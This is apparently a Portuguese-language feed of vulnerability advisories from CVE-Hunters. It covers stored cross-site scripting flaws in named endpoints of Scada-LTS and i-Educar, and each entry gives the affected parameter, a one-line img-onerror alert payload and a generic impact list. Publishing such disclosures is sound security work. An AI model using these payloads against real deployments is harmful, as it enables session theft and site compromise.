rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 09 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8743/ https://www.cvehunters.com/pt/p/cve-2025-8743/ <h2 id="cve-2025-8743-cross-site-scripting-xss-armazenado-no-endpoint-data_source_editshtm-parâmetro-name">CVE-2025-8743: Cross-Site Scripting (XSS) Armazenado no endpoint <code>data_source_edit.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8743" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8743</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>data_source_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>data_source_edit.shtm</code></p><h2 id="cve-2025-8743-cross-site-scripting-xss-armazenado-no-endpoint-data_source_editshtm-parâmetro-name">CVE-2025-8743: Cross-Site Scripting (XSS) Armazenado no endpoint <code>data_source_edit.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8743" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8743</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>data_source_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>data_source_edit.shtm</code></p> <p>Parâmetro: <code>name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC3')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8743/image.png" width="835" height="436" srcset="/p/cve-2025-8743/image_hu_1f6a33a750e3183c.png 480w, /p/cve-2025-8743/image_hu_3bb6ae9b4cbb06a1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 08 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8538/ https://www.cvehunters.com/pt/p/cve-2025-8538/ <h2 id="cve-2025-8538-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-tiposnovo">CVE-2025-8538: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>tipos/novo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8538" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8538</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>tipos/novo</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>name</code> e <code>description</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>tipos/novo</code></p><h2 id="cve-2025-8538-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-tiposnovo">CVE-2025-8538: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>tipos/novo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8538" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8538</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>tipos/novo</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>name</code> e <code>description</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>tipos/novo</code></p> <p>Parâmetros: <code>name</code> e <code>description</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>name</code> e <code>description</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8538/image.png" width="614" height="248" srcset="/p/cve-2025-8538/image_hu_e726bbb8f011c269.png 480w, /p/cve-2025-8538/image_hu_2443b37b14c56128.png 1024w" loading="lazy" alt="Parâmetro “name”" class="gallery-image" data-flex-grow="247" data-flex-basis="594px" /></p> <p><img src="/p/cve-2025-8538/image-1.png" width="603" height="240" srcset="/p/cve-2025-8538/image-1_hu_a11c807a5cc2d863.png 480w, /p/cve-2025-8538/image-1_hu_e38f31cce2d09ff0.png 1024w" loading="lazy" alt="Parâmetro “description”" class="gallery-image" data-flex-grow="251" data-flex-basis="603px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8539/ https://www.cvehunters.com/pt/p/cve-2025-8539/ <h2 id="cve-2025-8539-cross-site-scripting-xss-armazenado-no-endpoint-public_distrito_cadphp-parâmetro-nome">CVE-2025-8539: Cross-Site Scripting (XSS) Armazenado no endpoint <code>public_distrito_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8539" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8539</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>public_distrito_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>public_distrito_cad.php</code></p><h2 id="cve-2025-8539-cross-site-scripting-xss-armazenado-no-endpoint-public_distrito_cadphp-parâmetro-nome">CVE-2025-8539: Cross-Site Scripting (XSS) Armazenado no endpoint <code>public_distrito_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8539" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8539</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>public_distrito_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>public_distrito_cad.php</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8539/image.png" width="642" height="260" srcset="/p/cve-2025-8539/image_hu_837fe8e7d394bbec.png 480w, /p/cve-2025-8539/image_hu_26c8ccd795f751a6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="246" data-flex-basis="592px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8540/ https://www.cvehunters.com/pt/p/cve-2025-8540/ <h2 id="cve-2025-8540-cross-site-scripting-xss-armazenado-no-endpoint-public_municipio_cadphp-parâmetro-nome">CVE-2025-8540: Cross-Site Scripting (XSS) Armazenado no endpoint <code>public_municipio_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8540" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8540</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>public_municipio_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>public_municipio_cad.php</code></p><h2 id="cve-2025-8540-cross-site-scripting-xss-armazenado-no-endpoint-public_municipio_cadphp-parâmetro-nome">CVE-2025-8540: Cross-Site Scripting (XSS) Armazenado no endpoint <code>public_municipio_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8540" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8540</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>public_municipio_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>public_municipio_cad.php</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8540/image.png" width="629" height="255" srcset="/p/cve-2025-8540/image_hu_359015b5f1096a2a.png 480w, /p/cve-2025-8540/image_hu_3bdd2dd3ec479caf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="246" data-flex-basis="592px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8541/ https://www.cvehunters.com/pt/p/cve-2025-8541/ <h2 id="cve-2025-8541-cross-site-scripting-xss-armazenado-no-endpoint-public_uf_cadphp-parâmetro-nome">CVE-2025-8541: Cross-Site Scripting (XSS) Armazenado no endpoint <code>public_uf_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8541" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8541</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>public_uf_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>public_uf_cad.php</code></p><h2 id="cve-2025-8541-cross-site-scripting-xss-armazenado-no-endpoint-public_uf_cadphp-parâmetro-nome">CVE-2025-8541: Cross-Site Scripting (XSS) Armazenado no endpoint <code>public_uf_cad.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8541" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8541</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>public_uf_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>public_uf_cad.php</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8541/image.png" width="622" height="277" srcset="/p/cve-2025-8541/image_hu_18e90d6158627beb.png 480w, /p/cve-2025-8541/image_hu_cbe4a54f17fc1f35.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="224" data-flex-basis="538px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8542/ https://www.cvehunters.com/pt/p/cve-2025-8542/ <h2 id="cve-2025-8542-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-empresas_cadphp">CVE-2025-8542: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>empresas_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8542" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8542</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>empresas_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>fantasia</code> e <code>razao_social</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>empresas_cad.php</code></p><h2 id="cve-2025-8542-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-empresas_cadphp">CVE-2025-8542: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>empresas_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8542" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8542</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>empresas_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>fantasia</code> e <code>razao_social</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>empresas_cad.php</code></p> <p>Parâmetros: <code>fantasia</code> e <code>razao_social</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>fantasia</code> e <code>razao_social</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(1)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8542/image.png" width="612" height="242" srcset="/p/cve-2025-8542/image_hu_7e7a148fcd72d209.png 480w, /p/cve-2025-8542/image_hu_ebe59eb9954b9d45.png 1024w" loading="lazy" alt="Parâmetro “fantasia”" class="gallery-image" data-flex-grow="252" data-flex-basis="606px" /></p> <p><img src="/p/cve-2025-8542/image-1.png" width="638" height="246" srcset="/p/cve-2025-8542/image-1_hu_6d47618d6d2bc8d0.png 480w, /p/cve-2025-8542/image-1_hu_e2e58bf53ac570b9.png 1024w" loading="lazy" alt="Parâmetro “razao_social”" class="gallery-image" data-flex-grow="259" data-flex-basis="622px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" 